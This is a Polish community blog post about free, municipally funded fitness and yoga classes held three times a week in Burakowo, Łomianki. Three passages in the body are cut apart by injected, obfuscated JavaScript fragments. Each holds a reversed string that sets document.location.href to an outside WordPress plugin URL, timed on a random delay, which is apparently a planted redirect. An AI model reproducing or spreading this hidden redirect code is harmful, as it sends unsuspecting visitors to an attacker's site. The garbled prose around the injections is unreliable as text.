Ćwiczymy aktywnie

Już kolejny rok dzięki toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dofinansowaniu Gminy Łomianki mamy przyjemność prowadzić cykl bezpłatnych zajęć „Aktywnie na Parkowej”. W przyjaznej przestrzeni Domu Spotkań Sąsiedzkich w Burakowie mieszkańcy Łomianek spotykają się 3 razy w tygodniu, żeby wspólnie zadbać o siebie, wykonująć ogólnorozwojowe ćwiczenia fizyczne z elementami jogi.

Wszyscy wiemy, jak ważne jest aktywne spędzanie wolnego czasu, a systematyczność ćwiczeń fizycznych pozwala zadbać o nasze zdrowie, bo ruch toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to życie. Wiemy, że ze swojej natury joga nie wyklucza nikogo, uczy akceptacji siebie i innych, a co najważniejsze pokazuje też, że człowiek jest czymś więcej niż tylko ciałem i nie ogranicza się toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do określonego wyglądu.

Bardzo cieszy fakt, że nasza propozycja aktywizacji mieszkańców spotkała się z tak licznym odzewem mieszkańców. Systematycznie w zajęciach uczestniczy łącznie ponad 40 osób.

Jerzy Kostowski Opublikowane przez:

Bądź pierwszą osobą, która zostawi swój komentarz

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *


The reCAPTCHA verification period has expired. Please reload the page.